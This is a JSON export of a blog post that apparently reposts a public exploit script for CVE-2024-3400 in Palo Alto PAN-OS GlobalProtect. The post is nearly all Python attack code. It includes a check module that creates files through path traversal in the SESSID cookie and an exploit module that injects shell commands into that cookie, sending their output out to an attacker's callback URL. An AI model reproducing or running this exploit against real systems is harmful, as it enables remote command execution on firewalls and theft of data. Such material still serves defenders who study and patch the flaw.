{"id":56406,"date":"2024-04-23T21:40:01","date_gmt":"2024-04-23T17:40:01","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178216\/paloaltopanos-filecreateexec.txt"},"modified":"2024-04-23T21:40:01","modified_gmt":"2024-04-23T17:40:01","slug":"palo-alto-pan-os-command-execution-arbitrary-file-creation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/palo-alto-pan-os-command-execution-arbitrary-file-creation\/","title":{"rendered":"Palo Alto PAN-OS Command Execution \/ Arbitrary File Creation"},"content":{"rendered":"

# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 – Command Injection and Arbitrary File Creation
# Date: 21 Apr 2024
# Exploit Author: Kr0ff
# Vendor Homepage: https:\/\/security.paloaltonetworks.com\/CVE-2024-3400
# Software Link: –
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
# PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
# PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
# Tested on: Debian
# CVE : CVE-2024-3400<\/p>\n

#!\/usr\/bin\/env python3<\/p>\n

import sys<\/p>\n

try:
import argparse
import requests
except ImportError:
print(“Missing dependencies, either requests or argparse not installed”)
sys.exit(2)<\/p>\n

# https:\/\/attackerkb.com\/topics\/SSTk336Tmf\/cve-2024-3400\/rapid7-analysis
# https:\/\/labs.watchtowr.com\/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400\/<\/p>\n

def check_vuln(target: str, file: str) -> bool:
ret = False<\/p>\n

uri = “\/ssl-vpn\/hipreport.esp”<\/p>\n

s = requests.Session()
r = “”<\/p>\n

headers = {
“User-Agent” : \\
“Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/118.0.0.0 Safari\/537.36”, # Windows 10 Chrome 118.0.0.0
“Content-Type”: “application\/x-www-form-urlencoded”,
“Cookie”: \\
f”SESSID=..\/..\/..\/var\/appweb\/sslvpndocs\/global-protect\/portal\/images\/{file}”
} <\/p>\n

headers_noCookie = {
“User-Agent” : \\
“Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/118.0.0.0 Safari\/537.36” # Windows 10 Chrome 118.0.0.0
}<\/p>\n

if not “http:\/\/” or not “https:\/\/” in target:
target = “http:\/\/” + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f”Request timed out for \\”HTTP\\” !{e}”)<\/p>\n

print(“Trying with \\”HTTPS\\”…”)<\/p>\n

target = “https:\/\/” + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f”Request timed out for \\”HTTPS\\””)
sys.exit(1)
else:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<\/p>\n

if r.status_code == 200:
r = s.get( (target + f”\/global-protect\/portal\/images\/{file}”), verify=False, headers=headers_noCookie, timeout=10 )
if r.status_code == 403:
print(“Target vulnerable to CVE-2024-3400”)
ret = True
else:
return ret<\/p>\n

return ret<\/p>\n

def cmdexec(target: str, callback_url: str, payload: str) -> bool:
ret = False
p = “”<\/p>\n

if ” ” in payload:
p = payload.replace(” “, “${IFS)”)<\/p>\n

uri = “\/ssl-vpn\/hipreport.esp”<\/p>\n

headers = {
“User-Agent” : \\
“Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/118.0.0.0 Safari\/537.36”, # Windows 10 Chrome 118.0.0.0
“Content-Type”: “application\/x-www-form-urlencoded”,
“Cookie”: \\
f”SESSID=..\/..\/..\/..\/opt\/panlogs\/tmp\/device_telemetry\/minute\/attack782`{callback_url}?r=$({payload})`”<\/p>\n

} <\/p>\n

s = requests.Session()
r = “”<\/p>\n

if not “http:\/\/” or not “https:\/\/” in target:
target = “http:\/\/” + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f”Request timed out for \\”HTTP\\” !{e}”)<\/p>\n

print(“Trying with \\”HTTPS\\”…”)<\/p>\n

target = “https:\/\/” + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f”Request timed out for \\”HTTPS\\””)
sys.exit(1)
else:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<\/p>\n

if not “Success” in r.text:
return ret<\/p>\n

else:
ret = True<\/p>\n

return ret<\/p>\n

#Initilize parser for arguments
def argparser(selection=None):
parser = argparse.ArgumentParser( description=’CVE-2024-3400 – Palo Alto OS Command Injection’ )<\/p>\n

subparser = parser.add_subparsers( help=”Available modules”, dest=”module”)<\/p>\n

exploit_subp = subparser.add_parser( “exploit”, help=”Exploit module of script”)
exploit_subp.add_argument( “-t”, “–target”,help=”Target to send payload to”, required=True )
exploit_subp.add_argument( “-p”, “–payload”, help=”Payload to send (e.g: whoami)”, required=True )
exploit_subp.add_argument( “-c”, “–callbackurl”, help=”The callback url such as burp collaborator or similar”, required=True )
#—————————————
check_subp = subparser.add_parser( “check”, help=”Vulnerability check module of script” )
check_subp.add_argument( “-t”, “–target”, help=”Target to check if vulnerable”, required=True )
check_subp.add_argument( “-f”, “–filename”, help=”Filename of the payload (e.g \\”exploitCheck.exp\\””, required=True )<\/p>\n

args = parser.parse_args(selection)
args = parser.parse_args(args=None if sys.argv[1:] else [“-h”])<\/p>\n

if args.module == “exploit”:
cmdexec(args.target, args.callbackurl, args.payload)<\/p>\n

if args.module == “check”:
check_vuln(args.target, args.filename)<\/p>\n

if __name__ == “__main__”:
argparser()
print(“Finished !”)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 – Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https:\/\/security.paloaltonetworks.com\/CVE-2024-3400# Software Link: –# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 # PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1# PAN-OS 10.2 < 10.2.0-h3, < …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56406","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56406","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56406"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56406\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56406"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56406"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56406"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}